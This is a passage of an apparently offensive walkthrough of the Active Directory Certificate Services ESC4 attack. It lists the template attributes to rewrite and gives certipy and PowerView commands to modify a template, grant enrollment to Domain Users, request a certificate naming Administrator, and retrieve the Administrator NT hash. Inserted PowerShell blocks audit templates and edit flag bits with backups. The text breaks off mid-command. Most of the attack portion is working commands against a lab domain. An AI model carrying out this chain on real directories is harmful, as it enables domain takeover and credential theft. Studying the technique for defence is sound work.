
ESC4

ESC4 Abuse Requirements

ESC4 requires write access to a certificate template object in Active Directory: ownership of the template, or WriteOwner, WriteDacl, WriteProperty/GenericWrite or GenericAll on it. With that access an attacker can rewrite a template that is not vulnerable so that it becomes one. For instance, setting the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit in msPKI-Certificate-Name-Flag on a template that already permits domain authentication recreates the ESC1 condition: a low-privileged user with enrollment rights can request a certificate with an arbitrary Subject Alternative Name and authenticate as that account, up to full domain compromise.

To turn a template into an ESC1-style target it needs the following; the first is an ACL change, the rest are attribute values on the pKICertificateTemplate object:

  1. Enrollment rights on the template for the attacking principal (or a broad group such as Domain Users), i.e. the Certificate-Enrollment extended right.
  2. The CT_FLAG_PEND_ALL_REQUESTS bit (0x2) cleared in msPKI-Enrollment-Flag, which disables Manager Approval.
  3. msPKI-RA-Signature set to 0, which removes the Authorized Signatures requirement.
  4. The CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit (0x1) set in msPKI-Certificate-Name-Flag, so the requester can put another (privileged) account in the SAN.
  5. An EKU in msPKI-Certificate-Application-Policy that allows domain authentication, or no EKU at all:
    • Client Authentication (OID: 1.3.6.1.5.5.7.3.2)
    • Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)
    • PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)
    • Any Purpose (OID: 2.5.29.37.0)
    • No Extended Key Usage (EKU)
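The following PowerShell is added here and is not part of the original page. It decodes the attribute values behind conditions 2 to 5 so a template can be checked before and after an ESC4 edit, either from a live LDAP query against the Configuration partition or from values passed in by hand. Condition 1 (enrollment rights) is an ACE on the template object, not an attribute, and is outside this check. The template names, flag values and EKUs in the sample at the end are constructed for illustration, not read from a real directory; the sample is arranged so the original template fails the check and the modified one passes it.

```powershell
# Added example, not part of the original page: evaluates conditions 2-5 from the
# attribute values as AD stores them. Condition 1 (enrollment rights) is an ACE on
# the template object and is not covered here.

$CT_FLAG_PEND_ALL_REQUESTS         = 0x2   # msPKI-Enrollment-Flag: manager approval required
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag: requester supplies subject/SAN

# EKU OIDs that permit domain authentication (the list given above)
$AuthenticationEkus = @(
    '1.3.6.1.5.5.7.3.2',       # Client Authentication
    '1.3.6.1.4.1.311.20.2.2',  # Smart Card Logon
    '1.3.6.1.5.2.3.4',         # PKINIT Client Authentication
    '2.5.29.37.0'              # Any Purpose
)

function Test-Esc1Conditions {
    # Works on raw attribute values, so it accepts a live LDAP result or constructed data
    param(
        [Parameter(Mandatory)] [string] $Name,
        [Parameter(Mandatory)] [int]    $EnrollmentFlag,   # msPKI-Enrollment-Flag
        [Parameter(Mandatory)] [int]    $NameFlag,         # msPKI-Certificate-Name-Flag
        [Parameter(Mandatory)] [int]    $RaSignature,      # msPKI-RA-Signature
        [string[]] $Ekus = @()                              # application policy / EKU OIDs
    )
    $noManagerApproval = ($EnrollmentFlag -band $CT_FLAG_PEND_ALL_REQUESTS) -eq 0
    $noRaSignature     = $RaSignature -eq 0
    $requesterSan      = ($NameFlag -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
    # A template with no EKU at all can also be used for authentication (last bullet of condition 5)
    $authEku = ($Ekus.Count -eq 0) -or
               (@($Ekus | Where-Object { $AuthenticationEkus -contains $_ }).Count -gt 0)

    [pscustomobject]@{
        Template                = $Name
        NoManagerApproval       = $noManagerApproval
        NoRASignature           = $noRaSignature
        EnrolleeSuppliesSubject = $requesterSan
        AuthenticationEKU       = $authEku
        Esc1Ready               = $noManagerApproval -and $noRaSignature -and $requesterSan -and $authEku
    }
}

function Get-PropertyValues {
    # All values of one attribute from a SearchResult as strings; $Default when the attribute is absent
    param($Properties, [string] $Name, $Default = @())
    if ($Properties.Contains($Name) -and $Properties[$Name].Count -gt 0) {
        $Properties[$Name] | ForEach-Object { [string]$_ }
    } else { $Default }
}

function Get-CertificateTemplateReport {
    # Runs Test-Esc1Conditions over every template in the forest's Configuration partition
    param([string] $ConfigurationNC = ([ADSI]'LDAP://RootDSE').configurationNamingContext)
    $base     = "LDAP://CN=Certificate Templates,CN=Public Key Services,CN=Services,$ConfigurationNC"
    $searcher = New-Object System.DirectoryServices.DirectorySearcher -ArgumentList ([ADSI]$base)
    $searcher.Filter = '(objectClass=pKICertificateTemplate)'
    foreach ($attr in 'cn', 'mspki-enrollment-flag', 'mspki-certificate-name-flag',
                      'mspki-ra-signature', 'mspki-certificate-application-policy', 'pkiextendedkeyusage') {
        [void] $searcher.PropertiesToLoad.Add($attr)
    }
    foreach ($result in $searcher.FindAll()) {
        $p = $result.Properties
        # Older templates carry their EKUs only in pKIExtendedKeyUsage, so merge both attributes
        $ekus = @(@(Get-PropertyValues $p 'mspki-certificate-application-policy') +
                  @(Get-PropertyValues $p 'pkiextendedkeyusage') | Where-Object { $_ } | Select-Object -Unique)
        Test-Esc1Conditions -Name ([string](Get-PropertyValues $p 'cn')) `
            -EnrollmentFlag ([int](Get-PropertyValues $p 'mspki-enrollment-flag')) `
            -NameFlag       ([int](Get-PropertyValues $p 'mspki-certificate-name-flag')) `
            -RaSignature    ([int](Get-PropertyValues $p 'mspki-ra-signature' -Default '0')) `
            -Ekus           $ekus
    }
}

# Constructed sample (no directory needed): Template4 before and after the edits above.
# Before: manager approval on (0x2 set), one authorized signature required, and the subject
# is built from AD (0xA6000000, ENROLLEE_SUPPLIES_SUBJECT clear). After: the values the
# page sets, with Client Authentication kept as the EKU.
$before = Test-Esc1Conditions -Name 'Template4 (original)' -EnrollmentFlag 0x2B -NameFlag 0xA6000000 `
              -RaSignature 1 -Ekus '1.3.6.1.5.5.7.3.2', '1.3.6.1.4.1.311.10.3.4'
$after  = Test-Esc1Conditions -Name 'Template4 (modified)' -EnrollmentFlag 0x9 -NameFlag 0x1 `
              -RaSignature 0 -Ekus '1.3.6.1.5.5.7.3.2'
$before, $after | Format-Table -AutoSize
```

Run Get-CertificateTemplateReport from a domain-joined host to get the same table for every published template; a template that is Esc1Ready and also writable by low-privileged principals is the ESC4 case this page describes, and one that is Esc1Ready without any modification is plain ESC1.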

Linux

Overwriting the vulnerable template (saving its original configuration)

By default certipy template replaces the template's configuration with one that meets the conditions above; -save-old writes the current configuration to Template4.json so it can be restored afterwards.

PS /home/bobbuilder> certipy template -u 'user1@local.lab' -p 'password1' -template Template4 -save-old -dc-ip 10.10.10.10

Template after modification (certipy find should now report it as ESC1)

PS /home/bobbuilder> certipy find -u 'user1@local.lab' -p 'password1' -vulnerable -stdout -dc-ip 10.10.10.10

Abusing the modified template

Request a certificate with a SAN naming the target account. Use the full UPN so the KDC can map it to the account; certipy writes the result to administrator.pfx:

PS /home/bobbuilder> certipy req -u 'user1@local.lab' -p 'password1' -ca lab-LAB-DC-CA -template Template4 -upn 'administrator@local.lab'

Authenticate with the certificate over PKINIT and retrieve the Administrator NT hash (certipy auth also saves a TGT in a .ccache file)

PS /home/bobbuilder> certipy auth -pfx administrator.pfx -username Administrator -domain local.lab

Restore the original template configuration

PS /home/bobbuilder> certipy template -u 'user1@local.lab' -p 'password1' -template Template4 -configuration Template4.json -dc-ip 10.10.10.10

The same overwrite-and-restore cycle on a second template, here named SSL:

  1. Overwrite the template, saving its original configuration to SSL.json
PS /home/bobbuilder> certipy template -u "user1@local.lab" -p "password1" -template SSL -save-old -dc-ip 10.10.10.10
  2. Restore the saved configuration
PS /home/bobbuilder> certipy template -u "user1@local.lab" -p "password1" -template SSL -configuration SSL.json -dc-ip 10.10.10.10

Windows

Import-Module PowerView

PS /home/bobbuilder> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS /home/bobbuilder> Import-Module .\PowerView.ps1

Grant Certificate-Enrollment rights on the template (here to the Domain Users group; 0e10c968-78fb-11d2-90d4-00c04f79dc55 is the GUID of the Certificate-Enrollment extended right)

PS /home/bobbuilder> Add-DomainObjectAcl -TargetIdentity Template4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=lab,DC=local" -Verbose

Disabling Manager Approval Requirement

To disable the manager approval requirement, clear the CT_FLAG_PEND_ALL_REQUESTS bit (0x2) in msPKI-Enrollment-Flag. The value 9 written below is 0x1 (INCLUDE_SYMMETRIC_ALGORITHMS) | 0x8 (PUBLISH_TO_DS), so the 0x2 bit ends up clear; note that writing a literal replaces every other bit the template had (for example 0x20, AUTO_ENROLLMENT), so record the original value first if you intend to restore it:

PS /home/bobbuilder> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity Template4 -Set @{'mspki-enrollment-flag'=9} -Verbose
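Writing a literal such as 9 discards whatever other bits the template carried and leaves nothing to restore from. The read-modify-write below is an added example, not part of the original page or of PowerView: it sets or clears only the requested bits through ADSI and records the original value in a JSON file that the matching restore function writes back. It is written for both bit-field attributes this procedure touches, msPKI-Enrollment-Flag here and msPKI-Certificate-Name-Flag for the ENROLLEE_SUPPLIES_SUBJECT condition listed above. The template DN and the backup file name are assumptions.

```powershell
# Added example (not from the original page or PowerView): bit-safe update of a template
# flag attribute, keeping the original value so the change can be reverted.
# Template DN and backup path below are assumed.

$CT_FLAG_PEND_ALL_REQUESTS         = 0x2   # msPKI-Enrollment-Flag
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag

function Set-TemplateFlagBits {
    param(
        [Parameter(Mandatory)] [string] $TemplateDN,
        [Parameter(Mandatory)] [string] $Attribute,   # 'msPKI-Enrollment-Flag' or 'msPKI-Certificate-Name-Flag'
        [int]    $Set   = 0,       # bits to turn on
        [int]    $Clear = 0,       # bits to turn off
        [string] $BackupPath       # JSON file that receives the original value
    )
    $template = [ADSI]"LDAP://$TemplateDN"
    $current  = [int]$template.psbase.Properties[$Attribute].Value
    $new      = ($current -bor $Set) -band (-bnot $Clear)

    if ($BackupPath) {
        # Record the pre-change value once per attribute; later calls merge into the same file
        $backup = if (Test-Path $BackupPath) { Get-Content $BackupPath -Raw | ConvertFrom-Json }
                  else { [pscustomobject]@{} }
        if (-not $backup.PSObject.Properties[$Attribute]) {
            $backup | Add-Member -NotePropertyName $Attribute -NotePropertyValue $current
        }
        $backup | ConvertTo-Json | Set-Content $BackupPath
    }

    if ($new -ne $current) {
        $template.psbase.Properties[$Attribute].Value = $new
        $template.psbase.CommitChanges()
    }
    [pscustomobject]@{ Attribute = $Attribute; Before = ('0x{0:X8}' -f $current); After = ('0x{0:X8}' -f $new) }
}

function Restore-TemplateAttributes {
    # Writes every value recorded by Set-TemplateFlagBits back to the template
    param(
        [Parameter(Mandatory)] [string] $TemplateDN,
        [Parameter(Mandatory)] [string] $BackupPath
    )
    $template = [ADSI]"LDAP://$TemplateDN"
    $backup   = Get-Content $BackupPath -Raw | ConvertFrom-Json
    foreach ($prop in $backup.PSObject.Properties) {
        $template.psbase.Properties[$prop.Name].Value = [int]$prop.Value
    }
    $template.psbase.CommitChanges()
}

# Usage against the page's template (assumed DN): clear manager approval and allow a
# requester-supplied subject without touching any other bit
$dn = 'CN=Template4,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local'
Set-TemplateFlagBits -TemplateDN $dn -Attribute 'msPKI-Enrollment-Flag' `
    -Clear $CT_FLAG_PEND_ALL_REQUESTS -BackupPath .\Template4-original.json
Set-TemplateFlagBits -TemplateDN $dn -Attribute 'msPKI-Certificate-Name-Flag' `
    -Set $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -BackupPath .\Template4-original.json
# When finished:
# Restore-TemplateAttributes -TemplateDN $dn -BackupPath .\Template4-original.json
```

Each call prints the attribute's value before and after as 32-bit hex, which is also what to compare against the JSON file when verifying that the restore put the template back exactly.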

Disabling Authorized Signature Requirement

To disable the authorized signature requirement, set the msPKI-RA-Signature attribute to 0:

PS /home/bobbuilder> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab